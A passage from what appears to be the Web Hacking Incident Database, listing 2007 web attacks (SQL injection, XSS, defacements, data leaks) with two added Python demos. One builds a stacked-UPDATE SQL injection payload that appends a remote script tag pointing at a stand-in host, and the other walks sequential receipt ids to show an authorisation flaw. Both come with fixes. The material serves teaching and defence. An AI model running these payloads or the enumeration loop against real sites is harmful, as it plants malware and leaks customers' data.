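INSERT INTO products VALUES (1, 'Widget', 9.99);
"""
# Hypothetical script host; not a real address.
INJECTED = '<script src="http://example.invalid/b.js"></script>'


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def text_columns(db):
    """Every TEXT column of every user table, read from sqlite's catalog.
    The 2008 bots did this inside the injected T-SQL; here it is done in
    Python so the generated payload can be printed and inspected."""
    cols = []
    for (table,) in db.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        for row in db.execute(f"PRAGMA table_info({table})"):
            if row[2].upper() == "TEXT":
                cols.append((table, row[1]))
    return cols


def bot_payload(db):
    """A valid id followed by one stacked UPDATE per text column, each
    appending the script tag to whatever the column already holds."""
    updates = [f"UPDATE {t} SET {c} = {c} || '{INJECTED}'" for t, c in text_columns(db)]
    return "1; " + "; ".join(updates)


def lookup_vulnerable(db, news_id):
    """Concatenates user input into the statement. executescript() stands in
    for a driver that runs stacked statements, as the hacked ASP/MSSQL sites
    did; sqlite3's execute() would refuse the second statement."""
    db.executescript("SELECT title FROM news WHERE id = " + news_id)


def lookup_safe(db, news_id):
    """Parameterised: the whole input is bound as one value, never parsed as SQL."""
    return db.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchone()


def infected_cells(db):
    """Number of text cells, across all tables, that now carry the injected tag."""
    n = 0
    for t, c in text_columns(db):
        n += db.execute(f"SELECT count(*) FROM {t} WHERE {c} LIKE ?",
                        ("%" + INJECTED + "%",)).fetchone()[0]
    return n


def clean(db):
    """Strips the tag from every text column. Only viable because the exact
    string is known and the bot appended to, rather than replaced, the data;
    otherwise the only way back is a backup."""
    for t, c in text_columns(db):
        db.execute(f"UPDATE {t} SET {c} = REPLACE({c}, ?, '')", (INJECTED,))
    db.commit()


def demo():
    """Returns (cells hit by the bot, cells left after cleanup, result of the
    same payload against the parameterised lookup on a fresh database)."""
    db = open_db()
    payload = bot_payload(db)
    lookup_vulnerable(db, payload)
    hit = infected_cells(db)
    clean(db)
    left = infected_cells(db)
    safe = lookup_safe(open_db(), payload)  # string never equals an integer id
    return hit, left, safe
```

Run on the constructed schema, one injected request taints five cells across two tables; a homepage restore would fix none of them, which is the point of the paragraph above. `lookup_safe` returns nothing for the payload because the bound string is compared as a value, not spliced into the statement.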

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-81: MSNBC Turkish site caught serving malware
WHID ID: 2007-81
Date Occured: 1/1/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: Turkey
Incident Description:

Another malware planting, but this time at a very prominent web site: the Turkish edition of MSNBC. There are indications that this is an application-layer attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-80: Vodafone blocks website after hacking
WHID ID: 2007-80
Date Occured: 1/1/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Service Providers
Attacked Entity Geography: India
Incident Description:

Yet another defacement, but this time at a major telecommunications provider in India. These are the people in charge of our networks, after all!

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-79: Infamous Russian malware gang used SQL injection to penetrate US government sites
WHID ID: 2007-79
Date Occured: 1/1/2008
Attack Method: SQL Injection
Application Weakness:
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

RBN was a big story. It was a hacker group that could work relatively freely in Russia due to rumored connections in high places, which allowed it to offer safe hosting for malware. To drive people to the malware it penetrated web sites around the world, and the referenced article mentions SQL injection as the method by which it infiltrated higher-profile sites such as US government sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-78: A Brazilian banking site allows users to views receipts intended for others
WHID ID: 2007-78
Date Occured: 1/1/2008
Attack Method: Forceful Browsing
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Brazil
Incident Description:

IDG now reports a bug in the internet banking application of Unibanco, a Brazilian bank. The vulnerability allowed logged-in users to view the transaction receipts of other, unrelated users by changing the "receipt ID" in the form or URL.

Reported by Alexandre Sieira
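
The missing check in this class of bug is a single predicate. Below is an added example, not Unibanco's code, showing a receipt lookup that authenticates but does not authorize beside one that scopes the query to the caller, plus the id-walking loop an attacker runs against each. The table, ids and amounts are constructed.

```python
import sqlite3

# Constructed receipts table: two customers, each with their own transaction receipts.
SCHEMA = """
CREATE TABLE receipts (
    id INTEGER PRIMARY KEY, owner_id INTEGER NOT NULL, amount REAL, payee TEXT);
INSERT INTO receipts VALUES (1001, 1, 250.00, 'Electric company');
INSERT INTO receipts VALUES (1002, 2,  80.50, 'Bookshop');
INSERT INTO receipts VALUES (1003, 1,  12.00, 'Parking');
"""


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def receipt_vulnerable(db, logged_in_user, receipt_id):
    """Authenticates the caller (the session supplied logged_in_user) but never
    uses it: whichever id arrives in the URL or form is returned."""
    return db.execute(
        "SELECT id, owner_id, amount, payee FROM receipts WHERE id = ?",
        (receipt_id,)).fetchone()


def receipt_authorized(db, logged_in_user, receipt_id):
    """Scopes the lookup to the caller. A foreign id yields None, which the
    handler should answer with 404 so it does not confirm the id exists."""
    return db.execute(
        "SELECT id, owner_id, amount, payee FROM receipts "
        "WHERE id = ? AND owner_id = ?",
        (receipt_id, logged_in_user)).fetchone()


def enumerate_foreign(db, logged_in_user, lookup, first_id, last_id):
    """What the attacker does: walk a range of sequential receipt ids while
    logged in as themselves and keep every receipt that belongs to someone else."""
    leaked = []
    for rid in range(first_id, last_id + 1):
        row = lookup(db, logged_in_user, rid)
        if row is not None and row[1] != logged_in_user:
            leaked.append(row[0])
    return leaked
```

Making the ids unpredictable would slow the walk but is not a substitute for the ownership predicate; the check belongs in every query that takes an identifier from the client.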

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-77: HostGator: cPanel Security Hole Exploited in Mass Hack
WHID ID: 2007-77
Date Occured: 1/1/2008
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description:

Hackers exploited an unspecified cPanel vulnerability to break into HostGator servers and plant malware on hosted sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: cPanel
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-76: A large web hosting firm inflicted by mass malware installation
WHID ID: 2007-76
Date Occured: 1/1/2008
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description:

The Washington Post ran a story about a large-scale infiltration of iPower, a major hosting provider. According to the story and the comments that followed, the problem has been plaguing iPower for a long time without being resolved. Compare this with the PlusNet incident, which was serious but swiftly handled and publicly acknowledged by the company.

Actually, the problem is so pervasive that a recent StopBadware report lists iPower as by far the most malware-infected hosting company. Reports mention that the problem started as early as mid 2006.

The root cause of the breach is reported as a vulnerability in either Apache, PHP or cPanel. I have selected the third as the more probable until further evidence materializes.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: cPanel
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-75: PlusNet blames itself for webmail spamfest
WHID ID: 2007-75
Date Occured: 1/1/2008
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Service Providers
Attacked Entity Geography: UK
Incident Description:

Misconfiguration of a webmail system at a British hosting provider led to leakage of the entire user database, including all e-mails. The e-mail addresses were then actively used for sending spam. Additionally, the exploit was used to plant malware on some of the customers' web sites.

This incident is unique in that PlusNet published a very interesting and revealing report about the incident that sheds a lot of light on the real-world state of application security. A must read.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-74: Web host breach may have exposed passwords for 6,000 clients
WHID ID: 2007-74
Date Occured: 1/1/2008
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description:

A known vulnerability in the helpdesk software used by hosting provider Layered Technologies resulted in leakage of information, including names, addresses, phone numbers and email addresses of up to 6,000 of the company's clients.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Cerberus Helpdesk
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-73: Brokerage Firm Fined $375,000 for Unsecured Data
WHID ID: 2007-73
Date Occured: 12/26/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description: Brokerage firm DA Davidson has agreed to pay a fine of $375,000 for failing to protect confidential client data from Latvian hackers who breached the company in 2007 in an online extortion scheme. The hackers used a SQL injection attack to obtain access to the company’s database on Dec. 25 and 26, 2007.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2010/04/brokerage-firm-fined
Attack Source Geography: Latvia
Attacked System Technology:
Cost: $375000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-72: David Airey domains hijacked
WHID ID: 2007-72
Date Occured: 12/30/2007
Attack Method: Domain Hijacking
Application Weakness: Insufficient Process Validation
Outcome: Fraud
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description:

Update (Dec 30th 2008)

It seems that the original report was not accurate and it was not a CSRF vulnerability that was exploited. The mistake is reported by the victim in a blog post written as an imaginary discussion with Google (search the page for XSRF) and by Google. Google hints that it was a phishing attack, but David Airey is not convinced.


Many times we dismiss seemingly minor vulnerabilities in major web sites. Most notably, "yet another" XSS or CSRF vulnerability in a well-known service is not considered news anymore. However, the following story proves that, no matter what, such vulnerabilities cannot be ignored.

The attack is simple, the result pretty frightening. An attacker, presumably Iranian, stole the domain name of David Airey, a graphic artist and a known blogger. The attack was timed to coincide with David's departure on a long vacation. The goal was to extort money in return for the domain. In David's case there is a happy ending, as the attention he got helped him get his blog back, with some loss in traffic, search engine ranking and time. But other victims of attackers who steal domains for a living may not be as fortunate.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Iran
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-71: Hacker uses Social Security numbers from Ohio court site
WHID ID: 2007-71
Date Occured: 12/22/2007
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

The Secret Service has arrested at least 6 people in an investigation involving information theft from an Ohio court web site, information which was actively used for identity theft. At least one known identity theft case resulted in a $40,000 loss to the victim.

The sensitive information was stolen by manipulating predictable identifier parameters. The stolen information belongs to at least 270 people and includes names, addresses, ages and other information that could be used to obtain credit cards and open bank accounts.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-70: Tucson, Arizona police web site defaced using SQL injection
WHID ID: 2007-70
Date Occured: 12/20/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

Just like WHID 2007-60, this hack is probably representative of many other incidents. The Indonesian hacker Hmei7 left the message "Hmei7 has touched your soul" on the web site of the police department in Tucson, Arizona. Unlike a regular defacement, this time it was not the front page but the news section that was modified.

As many of you know, the news section is one of the few database-driven parts of many mostly static sites, as it allows the site owner to add news without requiring a web designer. Therefore it came as no surprise that the attack was identified by a public source as an SQL injection attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Indonesia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-69: The Orkut XSS Worm
WHID ID: 2007-69
Date Occured: 12/19/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

A vulnerability in the social networking site Orkut that allowed users to inject HTML and JavaScript into their profiles set the stage for a persistent XSS worm that appears to have affected more than 650,000 Orkut users.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-67: The Day My Web Site Was Hacked
WHID ID: 2007-67
Date Occured: 12/19/2007
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Link Spam
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description:

In an incident very similar to the Al Gore Hack, the personal blog of IT journalist Tim Anderson was also hacked. Unlike Mr. Gore, Tim discusses the breach and its origins.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-66: Hacker Conquer French Embassy In Libya Web Site
WHID ID: 2007-66
Date Occured: 12/19/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

To iframe or not to iframe, this is the question. As malware becomes more popular, the number of incidents, mostly insignificant, in which malware was planted on a hacked site is rising and WHID is not the right place to list all of them. We currently report such incidents if the hacked site is of interest or if the Attack_Method is known.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-65: Facebook suing a porn site over automated access
WHID ID: 2007-65
Date Occured: 12/19/2007
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field: Internet
Attacked Entity Geography:
Incident Description:

Use of robots and automated software against a web site, as long as it is not done in order to break into the site, falls into a grey area. While hard to classify as an unlawful act, it is usually harmful to the site owner and possibly to the site's users. Apart from consuming valuable resources, such automated access may breach the site's usage license for public information and might also indicate unlawful activity such as use of a botnet. Many times it is hard to know whether such a blast of requests is a denial of service attack, brute force password cracking or just a search engine crawler.

Going forward, we will add such incidents to WHID if there is reason to believe that they are not friendly, even if the actual goal of the attack cannot be easily classified. The Facebook case at hand is a perfect example: while the details are not clear, the fact that Facebook filed a lawsuit implies that there is fire behind the smoke.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-64: Information about Duke's Students and Applicants Stolen
WHID ID: 2007-64
Date Occured: 12/19/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

The personal data of nearly 1,400 prospective Duke Law School students may have been stolen by a hacker from two separate databases, one including the prospective students' data and another filled with requests for information about the school.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-63: Credit card data theft at Kartenhaus, a Ticketmaster German subsidiary
WHID ID: 2007-63
Date Occured: 12/19/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: Germany
Incident Description:

An unidentified group stole credit card numbers and billing addresses from Kartenhaus, a Hamburg, Germany ticket sales office and subsidiary of Ticketmaster. Some 66,000 customers who purchased tickets with a credit card from the Kartenhaus.de web site between October 24, 2006 and September 30, 2007 were affected.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-62: A security flaw in Passport Canada's website
WHID ID: 2007-62
Date Occured: 12/19/2007
Attack Method: Forceful Browsing
Application Weakness: Insufficient Authorization
Outcome: Monetary Loss
Attacked Entity Field: Government
Attacked Entity Geography: Canada
Incident Description:

The web site of the Canadian passport authority enabled users to access other people's records by modifying the value of a parameter in the URI.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-61: Another inconvenient truth: Al Gore's Web site hacked
WHID ID: 2007-61
Date Occured: 12/19/2007
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Link Spam
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

Whether comment spam by itself is an application failure or a necessary evil for sites allowing rich comments is an open question. However, it is reported that in this case a vulnerability in WordPress allowed the spammers to actually penetrate the site and modify pages, not just abuse comments.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-60: The blog of a Cambridge University security team hacked
WHID ID: 2007-60
Date Occured: 12/19/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Downtime
Attacked Entity Field: Education
Attacked Entity Geography: UK
Incident Description:

This story probably represents hundreds of similar stories. Many of us have come to rely on open source software, which is useful, feature-rich and free. It gives us access to tools that were available to only a few a couple of years ago. The downside is that this easy availability means that many use the tools without having the time, resources and expertise to protect them. Systems such as phpBB and WordPress are good examples of very popular open source systems that require constant attention in order to keep them secure.

I am sure that the guys at Light Blue Touchpaper have the expertise to protect their WordPress installation, but they don’t have the time. They made the compromise between ease of management of their web site and its security. Actually my personal blog might be just as vulnerable, since as I write this I am very much not paying attention to its security.

Apart from, or actually because of, the fact that the victims are security experts, this story is noteworthy due to two additional twists in the plot:

  • Zero-day exploit in the wild - the attacker penetrated twice, once using a known SQL injection vulnerability, but the second time using a previously unknown vulnerability in WordPress, which was reverse engineered and published for the first time by the people at Light Blue Touchpaper.
  • The researchers found that they could use Google to retrieve the hacker's hashed password. Google has become so big that it actually allows efficient lookup of hashed passwords.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-59: Hackers jack Monster.com, infect job hunters
WHID ID: 2007-59
Date Occured: 11/21/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

A Crimeware iframe tag on a site is not news anymore. On Monster.com it is.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-58: Internet Retailer Publisher Victim of Customer File Hack
WHID ID: 2007-58
Date Occured: 11/7/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

Vertical Web Media, publisher of Internet Retailer magazine, suffered a security breach in which credit card information of readers was stolen. The irony is that Internet Retailer magazine covers the risks of e-commerce.

While the actual technique used is not known, signs are that it was a web hack, as it was carried out by a distributed network of bots all over the world and the information stolen belonged to customers who paid online.

The information stolen includes names, addresses, e-mail addresses, phone numbers, credit card account numbers and card expiration dates. The Number_of_Records stolen is unknown.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-57: New Zealand's Government Web Sites Attacked And Information Stolen
WHID ID: 2007-57
Date Occured: 11/7/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: New Zealand
Incident Description:

An attack on New Zealand government web sites required New Zealand Prime Minister Helen Clark to comment and assure the public that no confidential information was stolen. However, official sources in New Zealand confirmed that attacks carried out on New Zealand government web sites by unnamed, but known, foreign governments resulted in the theft of information.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-56: TJMaxx XSS Vulnerability
WHID ID: 2007-56
Date Occured: 11/7/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

A small XSS vulnerability caught RSnake's eye. What makes it different, after all, when xssed.com lists thousands and thousands of those? What caught RSnake's eye was the vulnerable site. TJMaxx earned the reputation as the company that suffered the biggest security breach ever. You would expect them to be more careful.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-55: Malicious Code Infects Chinese Security Site
WHID ID: 2007-55
Date Occured: 11/7/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: China
Incident Description:

Defacements are a dime a dozen these days, and are not normally reported by WHID. Even invisible defacements, in which sites are changed in order to infect their clients with malicious code, are becoming too common. But this time it is the site of a security organization, and not just any one, but China's internet security organization. So in light of the hot debate about China as the source of all hacking, we think that this story has value.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-54: Mistake Left Constables Open To ID theft
WHID ID: 2007-54
Date Occured: 11/7/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: UK
Incident Description:

An Excel spreadsheet containing sensitive information regarding police officers in York, England was published online. The information included Social Security numbers of 46 officers and the home addresses of 74 officers. As a result, the identities of 3 officers were stolen.

While the information was pulled offline after a short period of time, it remained in the caches of several major search engines.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-53: Google's Advanced Search Operators Abused by Spammers
WHID ID: 2007-53
Date Occured: 11/7/2007
Attack Method: Redirection
Application Weakness: Insufficient Authorization
Outcome: Link Spam
Attacked Entity Field: Internet
Attacked Entity Geography: Global
Incident Description:

While most WHID entries are about web site breaches, sometimes a vulnerability in a web application is used indirectly. Redirection functions in web applications are commonly used by spammers and phishers. They allow them to include an honest-looking URL in their e-mail, thereby bypassing spam filters and observant users.

Symantec's response team found an actively used alternative on the best-known page on the Internet: Google's primary search page. By using Google's famous "I'm Feeling Lucky" feature, the spammer can automatically lead the victim to the first result of a search. All the spammer is left with is finding a query for which his site would pop up first on Google.

This method has another advantage over a redirection page: the final target is specified by a search string and not by a URL, bypassing smarter filters that know, or learn, that a URL passed as a parameter of a URL is most probably a redirection.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-52: Hacker halts Rivkin auction of 37 watches
WHID ID: 2007-52
Date Occured: 11/5/2007
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Retail
Attacked Entity Geography: Australia
Incident Description:

It seems that there is a new trend of disrupting online bidding using denial of service attacks. In this case, an auction for 37 very expensive watches was halted 20 minutes before the end as the site crashed, in what official sources describe as a hacker attack that did not result in a site compromise.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-51: 570 Scarborough & Tweed customers' personal information accessed by SQL injection
WHID ID: 2007-51
Date Occured: 11/4/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

The web servers of Scarborough & Tweed, a company that sells corporate gifts online, were compromised, and information about 570 customers may have been accessed using an SQL injection attack. The information includes customers' names, addresses, telephone numbers, account numbers, and credit card numbers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-50: Art.com says hacker accessed names, credit cards
WHID ID: 2007-50
Date Occured: 10/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: Global
Incident Description:

A hacker gained access to names and encrypted credit card numbers at Art.com. While the cause is not known, since the information is known to belong to online shoppers who made transactions from July to September, we assume it was a web site breach.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-49: Hackers Block Sale of Colorado Rockies World Series Tickets
WHID ID: 2007-49
Date Occured: 10/25/2007
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Loss of Sales
Attacked Entity Field: Sports
Attacked Entity Geography: USA
Incident Description:

The site of the Rockies was taken down by a denial of service attack, preventing fans from buying tickets for the World Series games.

Like any DDoS attack, it is very hard to know whether it was an application layer or network layer attack, but since this attack had a very significant financial impact by crippling a web site, we think it deserves a place in WHID.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-48: MSU investigating hacking incident
WHID ID: 2007-48
Date Occured: 10/17/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Information including birth dates and social security numbers of 1400 students who enrolled online at Montana State University has been stolen by hackers. While no technical explanation is provided, the fact that only students who enrolled online were affected points to a web site breach.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-47: Commerce Bank, a US regional bank, hacked
WHID ID: 2007-47
Date Occured: 10/12/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

3,000 records were exposed and 20 actually stolen at Commerce Bank, a small bank in the central USA. While the vulnerability exploited is not clear, SQL injection was mentioned. Therefore this record is uncertain and, based on further information, it might be withdrawn.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-46: School Web site breached? Personal info of Pembroke workers, volunteers accessible for months
WHID ID: 2007-46
Date Occured: 10/11/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Personal information on anyone who worked or volunteered for the Pembroke schools in the last four years was accessible via the Internet because of a weakness in the district's computer system. The information, including names, birth dates and Social Security numbers, was available from May until Oct. 2, when school officials learned of the problem.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-45: XSS flaw makes PM say: "I want to suck your blood"
WHID ID: 2007-45
Date Occured: 10/10/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Australia
Incident Description:

Using XSS on the sites of both Australian major political parties a security researcher nicknamed Bsoric caused the Liberal Party's Web site to read: "John Howard says: I want to suck your blood", while another script caused a window to pop up on the Labor Party's Web site, urging viewers to "Vote Liberal!"

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-44: Hacker Breaks Into eBay Server, Locks Users Out
WHID ID: 2007-44
Date Occured: 10/10/2007
Attack Method: Misconfiguration
Application Weakness: Insufficient Authentication
Outcome: Downtime
Attacked Entity Field: Retail
Attacked Entity Geography: USA
